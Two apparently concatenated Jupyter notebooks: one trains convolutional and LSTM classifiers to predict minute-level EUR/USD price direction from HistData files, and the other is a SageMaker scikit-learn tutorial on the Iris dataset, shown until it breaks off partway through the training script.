Resources and referencesThis github page was used for this exercise. https://github.com/Rachnog/Deep-Trading/And the data are gethared from *https://HistData.com* Data InfoIn our data, the column names were not given but the order is OPEN, HIGH, LOW, CLOSE There was also 'volume' column but that is not needed for this forecasting exercise.Data type: EUR/USD 1 min datathe dates between 01/01/2013 and 31/12/2018 were used for train and validation data.the dates between 01/01/2019 and 28/02/2019 were used for test data. Task InfoBinary classification.Classifies if the given time will have a higher value or lower value. Imports
###Code
from __future__ import print_function, absolute_import, division
# general imports for deep learning
import tensorflow as tf
from tensorflow.keras import layers
import numpy as np
from sklearn.preprocessing import StandardScaler
from sklearn import preprocessing
# data read
import pandas as pd
# plot
import matplotlib.pyplot as plt
from tensorflow.keras.utils import plot_model
# json and pretty print
import json
import pprint
# to persist the numpy arrays data
import h5py
# handle logging
tf.logging.set_verbosity(tf.logging.INFO)
###Output
_____no_output_____
###Markdown
Mount Google Drive
###Code
from google.colab import drive
drive.mount('/content/gdrive')
# check if correct place
!ls '/content/gdrive/My Drive/deep_learning/_data/forex/minutely/'
###Output
EURUSD_M1_2013.csv EURUSD_M1_2017.csv EURUSD_M1_201901.csv
EURUSD_M1_2014.csv 'EURUSD_M1_2018 (1).gsheet' EURUSD_M1_201902.csv
EURUSD_M1_2015.csv EURUSD_M1_2018.csv
EURUSD_M1_2016.csv EURUSD_M1_2018.gsheet
###Markdown
Get Data
###Code
# Tries to concatenate a list of arrays into one array
def get_concatenated_dataset(d_list):
result_data = d_list[0]
for d in d_list[1:]:
result_data = np.concatenate((result_data, d), axis=None)
return result_data
# Tries to check if the concatenated list is correct.
def concatenate_length_check(d_list, concatenated):
print("----------- length check -----------")
total_length = 0
for d in d_list:
total_length += len(d)
print("length: " +str(len(d)))
print("concatenated length "+str(len(concatenated)))
if(len(concatenated) == total_length):
print("concatenated length -----------> CORRECT")
else:
print("concatenated length -----------> WRONG")
###Output
_____no_output_____
###Markdown
Get Train And Validation Data
###Code
# initialize file names
data_folder = "/content/gdrive/My Drive/deep_learning/_data/forex/minutely/"
data_filenames = []
data_filenames.append("EURUSD_M1_2013.csv")
data_filenames.append("EURUSD_M1_2014.csv")
data_filenames.append("EURUSD_M1_2015.csv")
data_filenames.append("EURUSD_M1_2016.csv")
data_filenames.append("EURUSD_M1_2017.csv")
data_filenames.append("EURUSD_M1_2018.csv")
# get train data that will be both validation and train data in training mode
data_1 = pd.read_csv(data_folder+data_filenames[0], header=None)
data_2 = pd.read_csv(data_folder+data_filenames[1], header=None)
data_3 = pd.read_csv(data_folder+data_filenames[2], header=None)
data_4 = pd.read_csv(data_folder+data_filenames[3], header=None)
data_5 = pd.read_csv(data_folder+data_filenames[4], header=None)
data_6 = pd.read_csv(data_folder+data_filenames[5], header=None)
# Get all data as list
data_list = [data_1, data_2, data_3, data_4, data_5, data_6]
data_1.head()
# Get OPEN, HIGH, LOW, CLOSE columns in all data
open_data_list=[]
high_data_list=[]
low_data_list=[]
close_data_list=[]
for d in data_list:
open_data_list.append(d[2].as_matrix())
high_data_list.append(d[3].as_matrix())
low_data_list.append(d[4].as_matrix())
close_data_list.append(d[5].as_matrix())
# And CONCATENATE all of them
all_open_data = get_concatenated_dataset(open_data_list)
all_high_data = get_concatenated_dataset(high_data_list)
all_low_data = get_concatenated_dataset(low_data_list)
all_close_data = get_concatenated_dataset(close_data_list)
# CHECK IF CONCATENATION IS SUCCESSUL.
concatenate_length_check(open_data_list, all_open_data)
concatenate_length_check(high_data_list, all_high_data)
concatenate_length_check(low_data_list, all_low_data)
concatenate_length_check(close_data_list, all_close_data)
###Output
----------- length check -----------
length: 370611
length: 366477
length: 372210
length: 372679
length: 371635
length: 372607
concatenated length 2226219
concatenated length -----------> CORRECT
----------- length check -----------
length: 370611
length: 366477
length: 372210
length: 372679
length: 371635
length: 372607
concatenated length 2226219
concatenated length -----------> CORRECT
----------- length check -----------
length: 370611
length: 366477
length: 372210
length: 372679
length: 371635
length: 372607
concatenated length 2226219
concatenated length -----------> CORRECT
----------- length check -----------
length: 370611
length: 366477
length: 372210
length: 372679
length: 371635
length: 372607
concatenated length 2226219
concatenated length -----------> CORRECT
###Markdown
Get Test Data
###Code
# Train Data Has been gathered.
# Now Get Test data
raw_test_data_filename = "EURUSD_M1_201901.csv"
raw_test_data_1 = pd.read_csv(data_folder+raw_test_data_filename, header=None)
#raw_test_data_1 = raw_test_data_1[5].as_matrix()#get CLOSE column
raw_test_data_filename = "EURUSD_M1_201902.csv"
raw_test_data_2 = pd.read_csv(data_folder+raw_test_data_filename, header=None)
#raw_test_data_2 = raw_test_data_2[5].as_matrix()#get only CLOSE column
d_list = [raw_test_data_1, raw_test_data_2]
open_test_data_list=[]
high_test_data_list=[]
low_test_data_list=[]
close_test_data_list=[]
for d in d_list:
open_test_data_list.append(d[2].as_matrix())
high_test_data_list.append(d[3].as_matrix())
low_test_data_list.append(d[4].as_matrix())
close_test_data_list.append(d[5].as_matrix())
# And CONCATENATE test of them
test_open_data = get_concatenated_dataset(open_test_data_list)
test_high_data = get_concatenated_dataset(high_test_data_list)
test_low_data = get_concatenated_dataset(low_test_data_list)
test_close_data = get_concatenated_dataset(close_test_data_list)
# CHECK IF CONCATENATION IS SUCCESSUL.
concatenate_length_check(open_test_data_list, test_open_data)
concatenate_length_check(high_test_data_list, test_high_data)
concatenate_length_check(low_test_data_list, test_low_data)
concatenate_length_check(close_test_data_list, test_close_data)
###Output
_____no_output_____
###Markdown
General Variables For Prediction.
###Code
# How many of the past points were involved.
WINDOW = 30
# How many of data type is used as multivariate(open,high,low,close = 4)
EMB_SIZE = 4
# While training how many points should be ignored
STEP = 1
# Determines which time should be predictied
#(1 = 1 min further is predicted)
#(60 = 1 hour further is predicted)
FORECAST = 1
# Determines if the data is to be load.
LOAD = True
###Output
_____no_output_____
###Markdown
Separate Train, Valid, Test Construct The Desired DataGet the data as chunks with respect to window_size and other variables
###Code
def get_data_chunks(d_list, length, window=30, forecast=1, step=1):
X = []
Y = []
for i in range(0, TRAIN_LENGTH, STEP):
try:
# Get windowed data
o = d_list[0][i:i+WINDOW] # open
h = d_list[1][i:i+WINDOW] # high
l = d_list[2][i:i+WINDOW] # low
c = d_list[3][i:i+WINDOW] # close
# Normalize data
o = (np.array(o) - np.mean(o)) / np.std(o)
h = (np.array(h) - np.mean(h)) / np.std(h)
l = (np.array(l) - np.mean(l)) / np.std(l)
c = (np.array(c) - np.mean(c)) / np.std(c)
# x_i
x_i = d_list[3][i:i+WINDOW]
y_i = d_list[3][i+WINDOW+FORECAST]
last_close = x_i[-1]
next_close = y_i
if last_close < next_close:
y_i = [1, 0]
else:
y_i = [0, 1]
x_i = np.column_stack((o,h,l,c))
except Exception as e:
print(e)
# break when the limit is not enough
break
X.append(x_i)
Y.append(y_i)
print("data chunks are ready...")
return [X, Y]
def get_train_validation(X, y, percentage=0.8):
iXPercentage = int(len(X) * percentage)
iYPercentage = int(len(y) * percentage)
X_train = X[0:iXPercentage]
Y_train = y[0:iYPercentage]
#X_train, Y_train = shuffle_in_unison(X_train, Y_train)
X_test = X[iXPercentage:]
Y_test = y[iYPercentage:]
return X_train, X_test, Y_train, Y_test
###Output
_____no_output_____
###Markdown
Construct Data By HandIf there isn't any previously written data. Construct your data. Otherwise: load data from your files.
###Code
# PROCESSES WHOLE TRAIN SET
TRAIN_LENGTH = len(all_close_data)
TEST_LENGTH = len(test_close_data)
d_list = [all_open_data, all_high_data, all_low_data, all_close_data]
d_list_test = [test_open_data, test_high_data, test_low_data, test_close_data]
X, Y = get_data_chunks(d_list, TRAIN_LENGTH, window=WINDOW, forecast=FORECAST, step=STEP)
X_test, Y_test = get_data_chunks(d_list_test, TEST_LENGTH, window=WINDOW, forecast=FORECAST, step=STEP)
X = np.array(X)
Y = np.array(Y)
X_test = np.array(X_test)
Y_test = np.array(Y_test)
# Save X, Y and X_test, Y_test
save_folder = "/content/gdrive/My Drive/deep_learning/_data/numpy_arrays/"
filename="forex_multivariate_forecasting"
# Save Y
y_h5 = h5py.File(save_folder+filename+"_y.h5", 'w')
y_h5.create_dataset('dataset_Y', data=Y)
y_h5.close()
print("Saving Y Completed")
# Save X
x_h5 = h5py.File(save_folder+filename+"_x.h5", 'w')
x_h5.create_dataset('dataset_X', data=X)
x_h5.close()
print("Saving X Completed")
# Save X_test
x_test_h5 = h5py.File(save_folder+filename+"_x_test.h5", 'w')
x_test_h5.create_dataset('dataset_X_test', data=X_test)
x_test_h5.close()
print("Saving X_test Completed")
# Save Y_test
y_test_h5 = h5py.File(save_folder+filename+"_y_test.h5", 'w')
y_test_h5.create_dataset('dataset_Y_test', data=Y_test)
y_test_h5.close()
print("Saving Y_test Completed")
save_folder = "/content/gdrive/My Drive/deep_learning/_data/numpy_arrays/"
filename="forex_multivariate_forecasting"
# data can be loaded by this.
if(LOAD):
h5f = h5py.File(save_folder+filename+"_x.h5",'r')
X = h5f['dataset_X'][:]
h5f.close()
h5f = h5py.File(save_folder+filename+"_y.h5",'r')
Y = h5f['dataset_Y'][:]
h5f.close()
h5f = h5py.File(save_folder+filename+"_x_test.h5",'r')
X_test = h5f['dataset_X_test'][:]
h5f.close()
h5f = h5py.File(save_folder+filename+"_y_test.h5",'r')
Y_test = h5f['dataset_Y_test'][:]
h5f.close()
X_train, X_val, Y_train, Y_val = get_train_validation(X, Y)
print("OLD_shapes")
print(X.shape)
print(Y.shape)
print("*"*40)
print("New Shapes")
print(X_train.shape)
print(Y_train.shape)
print(X_val.shape)
print(Y_val.shape)
# reshape data
X_train = np.reshape(X_train, (X_train.shape[0], X_train.shape[1], EMB_SIZE))
X_test = np.reshape(X_test, (X_test.shape[0], X_test.shape[1], EMB_SIZE))
X_val = np.reshape(X_val, (X_val.shape[0], X_val.shape[1], EMB_SIZE))
print(X_train.shape)
print(X_val.shape)
print(X_test.shape)
###Output
(1780950, 30, 4)
(445238, 30, 4)
(54667, 30, 4)
###Markdown
Reduce the size of train dataTreain data has 1780950 points which leads an enormuous increase on train time. So reduce it if your setup is not enıugh to handle this much data.Perhaps reducing the data points could help train in terms of reducing overfitting.
###Code
#Reduce data points
exercise_use_percentage = 0.5
full_data_points = len(X)
desired_data_points = int(exercise_use_percentage * full_data_points)
X = X[desired_data_points:]
Y = Y[desired_data_points:]
# Get train and validation
X_train, X_val, Y_train, Y_val = get_train_validation(X, Y)
print("OLD_shapes")
print(X.shape)
print(Y.shape)
print("*"*40)
print("New Shapes")
print(X_train.shape)
print(Y_train.shape)
print(X_val.shape)
print(Y_val.shape)
# reshape data
X_train = np.reshape(X_train, (X_train.shape[0], X_train.shape[1], EMB_SIZE))
X_test = np.reshape(X_test, (X_test.shape[0], X_test.shape[1], EMB_SIZE))
X_val = np.reshape(X_val, (X_val.shape[0], X_val.shape[1], EMB_SIZE))
print(X_train.shape)
print(X_val.shape)
print(X_test.shape)
###Output
OLD_shapes
(556547, 30, 4)
(556547, 2)
****************************************
New Shapes
(445237, 30, 4)
(445237, 2)
(111310, 30, 4)
(111310, 2)
(445237, 30, 4)
(111310, 30, 4)
(54667, 30, 4)
###Markdown
Construct Model
###Code
def get_conv_model(tensor_shape, filter_size=64, kernel_size=4,dropout=0.5):
model = tf.keras.Sequential()
model.add(layers.Conv1D(input_shape=tensor_shape,
filters=filter_size,
kernel_size=kernel_size,
padding='same'))
model.add(layers.BatchNormalization())
model.add(layers.LeakyReLU())
model.add(layers.Dropout(dropout))
model.add(layers.Conv1D(filters=filter_size,
kernel_size=kernel_size,
padding='same'))
model.add(layers.MaxPool1D(pool_size=2,
padding='same'))
model.add(layers.Dropout(dropout))
model.add(layers.Flatten())
model.add(layers.Dense(64))
model.add(layers.BatchNormalization())
model.add(layers.LeakyReLU())
model.add(layers.Dense(2))
model.add(layers.Activation('softmax'))
return model
model = get_conv_model(tensor_shape=(WINDOW, EMB_SIZE))
model.summary()
###Output
_________________________________________________________________
Layer (type) Output Shape Param #
=================================================================
conv1d_2 (Conv1D) (None, 30, 64) 1088
_________________________________________________________________
batch_normalization_v1_3 (Ba (None, 30, 64) 256
_________________________________________________________________
leaky_re_lu_3 (LeakyReLU) (None, 30, 64) 0
_________________________________________________________________
dropout_2 (Dropout) (None, 30, 64) 0
_________________________________________________________________
conv1d_3 (Conv1D) (None, 30, 64) 16448
_________________________________________________________________
max_pooling1d (MaxPooling1D) (None, 15, 64) 0
_________________________________________________________________
dropout_3 (Dropout) (None, 15, 64) 0
_________________________________________________________________
flatten_1 (Flatten) (None, 960) 0
_________________________________________________________________
dense_2 (Dense) (None, 64) 61504
_________________________________________________________________
batch_normalization_v1_4 (Ba (None, 64) 256
_________________________________________________________________
leaky_re_lu_4 (LeakyReLU) (None, 64) 0
_________________________________________________________________
dense_3 (Dense) (None, 2) 130
_________________________________________________________________
activation_1 (Activation) (None, 2) 0
=================================================================
Total params: 79,682
Trainable params: 79,426
Non-trainable params: 256
_________________________________________________________________
###Markdown
TRAIN
###Code
#OPTIMIZER
opt = tf.keras.optimizers.Adam(lr=0.002)
#tf.train.AdamOptimizer(learning_rate=0.002)
# CALLBACKS
fp = save_folder+"fx_multivariate_model.hdf5"
reduce_lr = tf.keras.callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.9, patience=30, min_lr=0.000001, verbose=1)
checkpointer = tf.keras.callbacks.ModelCheckpoint(filepath=fp, verbose=1, save_best_only=True)
#COMPILE
model.compile(optimizer=opt,
loss='categorical_crossentropy',
metrics=['accuracy'])
# TRAIN
# epochs= 100 normally
# batch_size = 128
history = model.fit(
X_train,
Y_train,
epochs = 30,
batch_size = 128,
verbose=1,
validation_data=(X_val, Y_val),
callbacks=[reduce_lr, checkpointer],
shuffle=True)
###Output
Train on 445237 samples, validate on 111310 samples
WARNING:tensorflow:From /usr/local/lib/python3.6/dist-packages/tensorflow/python/ops/math_ops.py:3066: to_int32 (from tensorflow.python.ops.math_ops) is deprecated and will be removed in a future version.
Instructions for updating:
Use tf.cast instead.
Epoch 1/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6955 - acc: 0.5147
Epoch 00001: val_loss improved from inf to 0.69360, saving model to /content/gdrive/My Drive/deep_learning/_data/numpy_arrays/fx_multivariate_model.hdf5
445237/445237 [==============================] - 121s 271us/sample - loss: 0.6955 - acc: 0.5146 - val_loss: 0.6936 - val_acc: 0.5037
Epoch 2/30
445056/445237 [============================>.] - ETA: 0s - loss: 0.6920 - acc: 0.5219
Epoch 00002: val_loss improved from 0.69360 to 0.69149, saving model to /content/gdrive/My Drive/deep_learning/_data/numpy_arrays/fx_multivariate_model.hdf5
445237/445237 [==============================] - 118s 266us/sample - loss: 0.6920 - acc: 0.5219 - val_loss: 0.6915 - val_acc: 0.5257
Epoch 3/30
445056/445237 [============================>.] - ETA: 0s - loss: 0.6916 - acc: 0.5237
Epoch 00003: val_loss improved from 0.69149 to 0.69141, saving model to /content/gdrive/My Drive/deep_learning/_data/numpy_arrays/fx_multivariate_model.hdf5
445237/445237 [==============================] - 120s 270us/sample - loss: 0.6916 - acc: 0.5237 - val_loss: 0.6914 - val_acc: 0.5253
Epoch 4/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6915 - acc: 0.5248
Epoch 00004: val_loss improved from 0.69141 to 0.69121, saving model to /content/gdrive/My Drive/deep_learning/_data/numpy_arrays/fx_multivariate_model.hdf5
445237/445237 [==============================] - 119s 268us/sample - loss: 0.6915 - acc: 0.5248 - val_loss: 0.6912 - val_acc: 0.5271
Epoch 5/30
445056/445237 [============================>.] - ETA: 0s - loss: 0.6914 - acc: 0.5251
Epoch 00005: val_loss improved from 0.69121 to 0.69111, saving model to /content/gdrive/My Drive/deep_learning/_data/numpy_arrays/fx_multivariate_model.hdf5
445237/445237 [==============================] - 118s 264us/sample - loss: 0.6914 - acc: 0.5251 - val_loss: 0.6911 - val_acc: 0.5276
Epoch 6/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6913 - acc: 0.5256
Epoch 00006: val_loss improved from 0.69111 to 0.69095, saving model to /content/gdrive/My Drive/deep_learning/_data/numpy_arrays/fx_multivariate_model.hdf5
445237/445237 [==============================] - 118s 264us/sample - loss: 0.6913 - acc: 0.5255 - val_loss: 0.6909 - val_acc: 0.5278
Epoch 7/30
445056/445237 [============================>.] - ETA: 0s - loss: 0.6913 - acc: 0.5263
Epoch 00007: val_loss improved from 0.69095 to 0.69075, saving model to /content/gdrive/My Drive/deep_learning/_data/numpy_arrays/fx_multivariate_model.hdf5
445237/445237 [==============================] - 117s 263us/sample - loss: 0.6913 - acc: 0.5263 - val_loss: 0.6908 - val_acc: 0.5277
Epoch 8/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6913 - acc: 0.5265
Epoch 00008: val_loss did not improve from 0.69075
445237/445237 [==============================] - 119s 267us/sample - loss: 0.6913 - acc: 0.5265 - val_loss: 0.6909 - val_acc: 0.5278
Epoch 9/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6912 - acc: 0.5267
Epoch 00009: val_loss did not improve from 0.69075
445237/445237 [==============================] - 118s 264us/sample - loss: 0.6912 - acc: 0.5267 - val_loss: 0.6910 - val_acc: 0.5277
Epoch 10/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6912 - acc: 0.5260
Epoch 00010: val_loss did not improve from 0.69075
445237/445237 [==============================] - 118s 266us/sample - loss: 0.6912 - acc: 0.5260 - val_loss: 0.6912 - val_acc: 0.5255
Epoch 11/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6912 - acc: 0.5261
Epoch 00011: val_loss did not improve from 0.69075
445237/445237 [==============================] - 117s 263us/sample - loss: 0.6912 - acc: 0.5261 - val_loss: 0.6909 - val_acc: 0.5271
Epoch 12/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6912 - acc: 0.5265
Epoch 00012: val_loss did not improve from 0.69075
445237/445237 [==============================] - 118s 265us/sample - loss: 0.6912 - acc: 0.5265 - val_loss: 0.6909 - val_acc: 0.5273
Epoch 13/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6911 - acc: 0.5271
Epoch 00013: val_loss did not improve from 0.69075
445237/445237 [==============================] - 118s 264us/sample - loss: 0.6911 - acc: 0.5271 - val_loss: 0.6908 - val_acc: 0.5285
Epoch 14/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6911 - acc: 0.5269
Epoch 00014: val_loss did not improve from 0.69075
445237/445237 [==============================] - 117s 262us/sample - loss: 0.6911 - acc: 0.5269 - val_loss: 0.6910 - val_acc: 0.5274
Epoch 15/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6911 - acc: 0.5273
Epoch 00015: val_loss did not improve from 0.69075
445237/445237 [==============================] - 118s 265us/sample - loss: 0.6911 - acc: 0.5273 - val_loss: 0.6909 - val_acc: 0.5281
Epoch 16/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6911 - acc: 0.5275
Epoch 00016: val_loss did not improve from 0.69075
445237/445237 [==============================] - 117s 264us/sample - loss: 0.6911 - acc: 0.5275 - val_loss: 0.6909 - val_acc: 0.5266
Epoch 17/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6911 - acc: 0.5266
Epoch 00017: val_loss did not improve from 0.69075
445237/445237 [==============================] - 118s 266us/sample - loss: 0.6911 - acc: 0.5266 - val_loss: 0.6909 - val_acc: 0.5274
Epoch 18/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6911 - acc: 0.5267
Epoch 00018: val_loss did not improve from 0.69075
445237/445237 [==============================] - 117s 264us/sample - loss: 0.6911 - acc: 0.5267 - val_loss: 0.6930 - val_acc: 0.5210
Epoch 19/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6911 - acc: 0.5269
Epoch 00019: val_loss did not improve from 0.69075
445237/445237 [==============================] - 118s 265us/sample - loss: 0.6911 - acc: 0.5269 - val_loss: 0.6909 - val_acc: 0.5279
Epoch 20/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6911 - acc: 0.5270
Epoch 00020: val_loss did not improve from 0.69075
445237/445237 [==============================] - 118s 264us/sample - loss: 0.6911 - acc: 0.5270 - val_loss: 0.6910 - val_acc: 0.5273
Epoch 21/30
445056/445237 [============================>.] - ETA: 0s - loss: 0.6911 - acc: 0.5275
Epoch 00021: val_loss did not improve from 0.69075
445237/445237 [==============================] - 117s 262us/sample - loss: 0.6911 - acc: 0.5275 - val_loss: 0.6914 - val_acc: 0.5243
Epoch 22/30
445056/445237 [============================>.] - ETA: 0s - loss: 0.6910 - acc: 0.5268
Epoch 00022: val_loss did not improve from 0.69075
445237/445237 [==============================] - 116s 261us/sample - loss: 0.6910 - acc: 0.5268 - val_loss: 0.6908 - val_acc: 0.5287
Epoch 23/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6910 - acc: 0.5272
Epoch 00023: val_loss did not improve from 0.69075
445237/445237 [==============================] - 116s 260us/sample - loss: 0.6910 - acc: 0.5272 - val_loss: 0.6908 - val_acc: 0.5284
Epoch 24/30
445056/445237 [============================>.] - ETA: 0s - loss: 0.6910 - acc: 0.5273
Epoch 00024: val_loss did not improve from 0.69075
445237/445237 [==============================] - 118s 264us/sample - loss: 0.6910 - acc: 0.5273 - val_loss: 0.6909 - val_acc: 0.5293
Epoch 25/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6910 - acc: 0.5274
Epoch 00025: val_loss did not improve from 0.69075
445237/445237 [==============================] - 117s 263us/sample - loss: 0.6910 - acc: 0.5274 - val_loss: 0.6910 - val_acc: 0.5272
Epoch 26/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6910 - acc: 0.5274
Epoch 00026: val_loss did not improve from 0.69075
445237/445237 [==============================] - 115s 259us/sample - loss: 0.6910 - acc: 0.5274 - val_loss: 0.6908 - val_acc: 0.5285
Epoch 27/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6910 - acc: 0.5277
Epoch 00027: val_loss did not improve from 0.69075
445237/445237 [==============================] - 117s 262us/sample - loss: 0.6910 - acc: 0.5277 - val_loss: 0.6910 - val_acc: 0.5281
Epoch 28/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6911 - acc: 0.5271
Epoch 00028: val_loss did not improve from 0.69075
445237/445237 [==============================] - 119s 267us/sample - loss: 0.6911 - acc: 0.5271 - val_loss: 0.6909 - val_acc: 0.5289
Epoch 29/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6910 - acc: 0.5272
Epoch 00029: val_loss did not improve from 0.69075
445237/445237 [==============================] - 118s 265us/sample - loss: 0.6910 - acc: 0.5272 - val_loss: 0.6909 - val_acc: 0.5282
Epoch 30/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6910 - acc: 0.5282
Epoch 00030: val_loss did not improve from 0.69075
445237/445237 [==============================] - 118s 265us/sample - loss: 0.6910 - acc: 0.5282 - val_loss: 0.6909 - val_acc: 0.5289
###Markdown
TEST
###Code
# TEST
# LOAD weights
model.load_weights(fp)
pred = model.predict(np.array(X_test))
pred
#from sklearn.metrics import classification_report
#from sklearn.metrics import confusion_matrix
#C = confusion_matrix([np.argmax(y) for y in Y_test], [np.argmax(y) for y in pred])
#print(C)
#print("*"*20)
#print(C / C.astype(np.float).sum(axis=1))
model.evaluate(X_test,Y_test,batch_size=128)
###Output
0.5340150364936799
###Markdown
PLOT Trained Model
###Code
# PLOT
plt.figure()
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='best')
plt.show()
plt.figure()
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='best')
plt.show()
###Output
_____no_output_____
###Markdown
LSTM approach
###Code
def build_lstm_model(tensor_shape, batch_size=128, hidden_neurons=100):
model = tf.keras.Sequential()
model.add(layers.LSTM(hidden_neurons,
batch_input_shape=(batch_size, tensor_shape[0], tensor_shape[1]),
return_sequences=True))
model.add(layers.LSTM(hidden_neurons, return_sequences=True))
model.add(layers.LSTM(hidden_neurons))
model.add(layers.Flatten())
model.add(layers.Dense(64,activation='relu'))
model.add(layers.BatchNormalization())
model.add(layers.Dense(32,activation='relu'))
model.add(layers.Dense(2, activation='softmax'))
return model
BATCH_SIZE=512
print(X_train.shape)
model_2 = build_lstm_model(tensor_shape=(X_train.shape[1], X_train.shape[2]), batch_size=BATCH_SIZE)
model_2.summary()
#OPTIMIZER
opt = tf.keras.optimizers.Adam(lr=0.002)
#tf.train.AdamOptimizer(learning_rate=0.002)
# CALLBACKS
fp = save_folder+"fx_multivariate_model_lstm.hdf5"
reduce_lr = tf.keras.callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.9, patience=30, min_lr=0.000001, verbose=1)
checkpointer = tf.keras.callbacks.ModelCheckpoint(filepath=fp, verbose=1, save_best_only=True)
#COMPILE
model_2.compile(optimizer=opt,
loss='categorical_crossentropy',
metrics=['accuracy'])
# TRAIN
# epochs= 100 normally
# batch_size = 128
history = model_2.fit(
X_train,
Y_train,
epochs = 1,
batch_size = 512,
verbose=1,
validation_data=(X_val, Y_val),
callbacks=[reduce_lr, checkpointer],
shuffle=True)
###Output
_____no_output_____ |
sklearn_batch_transform_iris/scikit_learn_estimator_example_with_batch_transform.ipynb | ###Markdown
Iris Training and Prediction with Sagemaker Scikit-learnThis tutorial shows you how to use [Scikit-learn](https://scikit-learn.org/stable/) with Sagemaker by utilizing the pre-built container. Scikit-learn is a popular Python machine learning framework. It includes a number of different algorithms for classification, regression, clustering, dimensionality reduction, and data/feature pre-processing. The [sagemaker-python-sdk](https://github.com/aws/sagemaker-python-sdk) module makes it easy to take existing scikit-learn code, which we will show by training a model on the IRIS dataset and generating a set of predictions. For more information about the Scikit-learn container, see the [sagemaker-scikit-learn-containers](https://github.com/aws/sagemaker-scikit-learn-container) repository and the [sagemaker-python-sdk](https://github.com/aws/sagemaker-python-sdk) repository.For more on Scikit-learn, please visit the Scikit-learn website: . Table of contents* [Upload the data for training](upload_data)* [Create a Scikit-learn script to train with](create_sklearn_script)* [Create the SageMaker Scikit Estimator](create_sklearn_estimator)* [Train the SKLearn Estimator on the Iris data](train_sklearn)* [Using the trained model to make inference requests](inferece) * [Deploy the model](deploy) * [Choose some data and use it for a prediction](prediction_request) * [Endpoint cleanup](endpoint_cleanup)* [Batch Transform](batch_transform) * [Prepare Input Data](prepare_input_data) * [Run Transform Job](run_transform_job) * [Check Output Data](check_output_data) **Note: this example requires SageMaker Python SDK v2.**
###Code
%pip install -U sagemaker>=2.15
###Output
_____no_output_____
###Markdown
First, lets create our Sagemaker session and role, and create a S3 prefix to use for the notebook example.
###Code
# S3 prefix
prefix = 'Scikit-iris'
import sagemaker
from sagemaker import get_execution_role
sagemaker_session = sagemaker.Session()
# Get a SageMaker-compatible role used by this Notebook Instance.
role = get_execution_role()
###Output
_____no_output_____
###Markdown
Upload the data for training When training large models with huge amounts of data, you'll typically use big data tools, like Amazon Athena, AWS Glue, or Amazon EMR, to create your data in S3. For the purposes of this example, we're using a sample of the classic [Iris dataset](https://en.wikipedia.org/wiki/Iris_flower_data_set), which is included with Scikit-learn. We will load the dataset, write locally, then write the dataset to s3 to use.
###Code
import numpy as np
import os
from sklearn import datasets
# Load Iris dataset, then join labels and features
iris = datasets.load_iris()
joined_iris = np.insert(iris.data, 0, iris.target, axis=1)
# Create directory and write csv
os.makedirs('./data', exist_ok=True)
np.savetxt('./data/iris.csv', joined_iris, delimiter=',', fmt='%1.1f, %1.3f, %1.3f, %1.3f, %1.3f')
###Output
_____no_output_____
###Markdown
Once we have the data locally, we can use use the tools provided by the SageMaker Python SDK to upload the data to a default bucket.
###Code
WORK_DIRECTORY = 'data'
train_input = sagemaker_session.upload_data(WORK_DIRECTORY, key_prefix="{}/{}".format(prefix, WORK_DIRECTORY) )
###Output
_____no_output_____
###Markdown
Create a Scikit-learn script to train with SageMaker can now run a scikit-learn script using the `SKLearn` estimator. When executed on SageMaker a number of helpful environment variables are available to access properties of the training environment, such as:* `SM_MODEL_DIR`: A string representing the path to the directory to write model artifacts to. Any artifacts saved in this folder are uploaded to S3 for model hosting after the training job completes.* `SM_OUTPUT_DIR`: A string representing the filesystem path to write output artifacts to. Output artifacts may include checkpoints, graphs, and other files to save, not including model artifacts. These artifacts are compressed and uploaded to S3 to the same S3 prefix as the model artifacts.Supposing two input channels, 'train' and 'test', were used in the call to the `SKLearn` estimator's `fit()` method, the following environment variables will be set, following the format `SM_CHANNEL_[channel_name]`:* `SM_CHANNEL_TRAIN`: A string representing the path to the directory containing data in the 'train' channel* `SM_CHANNEL_TEST`: Same as above, but for the 'test' channel.A typical training script loads data from the input channels, configures training with hyperparameters, trains a model, and saves a model to model_dir so that it can be hosted later. Hyperparameters are passed to your script as arguments and can be retrieved with an `argparse.ArgumentParser` instance. For example, the script that we will run in this notebook is the below:```pythonfrom __future__ import print_functionimport argparseimport joblibimport osimport pandas as pdfrom sklearn import treeif __name__ == '__main__': parser = argparse.ArgumentParser() Hyperparameters are described here. In this simple example we are just including one hyperparameter. parser.add_argument('--max_leaf_nodes', type=int, default=-1) Sagemaker specific arguments. Defaults are set in the environment variables. parser.add_argument('--output-data-dir', type=str, default=os.environ['SM_OUTPUT_DATA_DIR']) parser.add_argument('--model-dir', type=str, default=os.environ['SM_MODEL_DIR']) parser.add_argument('--train', type=str, default=os.environ['SM_CHANNEL_TRAIN']) args = parser.parse_args() Take the set of files and read them all into a single pandas dataframe input_files = [ os.path.join(args.train, file) for file in os.listdir(args.train) ] if len(input_files) == 0: raise ValueError(('There are no files in {}.\n' + 'This usually indicates that the channel ({}) was incorrectly specified,\n' + 'the data specification in S3 was incorrectly specified or the role specified\n' + 